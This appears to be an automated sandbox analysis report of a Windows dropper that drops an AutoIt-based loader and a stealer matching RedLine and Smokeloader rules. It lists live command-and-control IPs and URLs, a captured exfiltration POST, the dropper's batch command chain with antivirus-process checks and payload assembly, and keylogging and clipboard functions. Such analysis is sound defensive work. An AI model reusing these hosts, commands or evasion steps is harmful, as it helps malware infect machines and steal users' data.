Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa
Source: global traffic	DNS traffic detected: DNS query: post-to-me.com

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 31 38 31 38 36 35 45 36 30 36 31 34 33 37 37 38 38 36 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="hwid"E3181865E6061437788654------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="build"default6_cap------JDBGHIIDAECBFIDHIIDG--

Source: Welding.pif, Welding.pif, 0000000F.00000002.4150963294.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe:
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/Hx
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/L
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php32
Source: 478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php;C7
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpDZT
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpL
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpXZH
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpd
Source: 478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/ows
Source: 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150PT~
Source: Welding.pif	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exe
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.151/ScreenUpdateSync.exegyaCannot
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: M13W1o3scc.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728096026.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2028195478.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/P
Source: Welding.pif	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DEvector
Source: Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 60060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60060

Source: unknown

HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:60060 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00124830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	15_2_00124830
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BEF4F IsClipboardFormatAvailable,EmptyClipboard,SetClipboardData,	15_2_000BEF4F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,	15_2_004016E3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004026BB InternetReadFile,_strlen,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,GlobalFree,	15_2_004026BB

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00124632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

15_2_00124632

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_0013D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

15_2_0013D164

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114254: CreateFileW,DeviceIoControl,CloseHandle,

15_2_00114254

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00108F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

15_2_00108F2E

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00115778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		15_2_00115778

Creates files inside the system directory

Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\EffortCoupled	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\FindingItunes	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	File created: C:\Windows\RaleighWard	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: 0_2_004074BB	0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D23F5	15_2_000D23F5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00138400	15_2_00138400
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6502	15_2_000E6502
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E265E	15_2_000E265E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BE6F0	15_2_000BE6F0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D282A	15_2_000D282A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E89BF	15_2_000E89BF
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130A3A	15_2_00130A3A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6A74	15_2_000E6A74
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C0BE0	15_2_000C0BE0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DCD51	15_2_000DCD51
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0010EDB2	15_2_0010EDB2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118E44	15_2_00118E44
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00130EB7	15_2_00130EB7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E6FE6	15_2_000E6FE6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BB020	15_2_000BB020
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D33B7	15_2_000D33B7
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DF409	15_2_000DF409
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CD45D	15_2_000CD45D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B94E0	15_2_000B94E0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CF628	15_2_000CF628
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B1663	15_2_000B1663
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D16B4	15_2_000D16B4
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D78C3	15_2_000D78C3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1BA8	15_2_000D1BA8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DDBA5	15_2_000DDBA5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000B9C80	15_2_000B9C80
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000E9CE5	15_2_000E9CE5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CDD28	15_2_000CDD28
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D1FC0	15_2_000D1FC0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DBFD6	15_2_000DBFD6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040806D	15_2_0040806D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438013	15_2_00438013
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428434	15_2_00428434
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042E56A	15_2_0042E56A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00429510	15_2_00429510
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0041765F	15_2_0041765F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004146D5	15_2_004146D5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00438729	15_2_00438729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004287A6	15_2_004287A6
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0040F91D	15_2_0040F91D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428A50	15_2_00428A50
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00419A5F	15_2_00419A5F
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042FB60	15_2_0042FB60
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428D17	15_2_00428D17
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00414EBB	15_2_00414EBB
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00428FD2	15_2_00428FD2

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\773416\Welding.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000C1A36 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004108AC appears 36 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 00410D5B appears 127 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 004116D0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: String function: 000D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Code function: String function: 004062A3 appears 58 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048

Sample file is different than original file name gathered from version info

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAutoIt3.exeB vs M13W1o3scc.exe

Uses 32bit PE files

Source: M13W1o3scc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000010.00000002.2258864711.00000000007E1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@27/22@2/3

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_0011A6AD GetLastError,FormatMessageW,

15_2_0011A6AD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00108DE9 AdjustTokenPrivileges,CloseHandle,		15_2_00108DE9
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00109399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		15_2_00109399

Source: C:\Users\user\Desktop\M13W1o3scc.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

15_2_00114148

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000BE36D QueryPerformanceFrequency,timeGetTime,LockResource,Sleep,

15_2_000BE36D

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8096
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Mutant created: \Sessions\1\BaseNamedObjects\prtscreen1566
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File created: C:\Users\user\AppData\Local\Temp\nsp6BB5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat

Source: M13W1o3scc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\user\Desktop\M13W1o3scc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\M13W1o3scc.exe "C:\Users\user\Desktop\M13W1o3scc.exe"
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
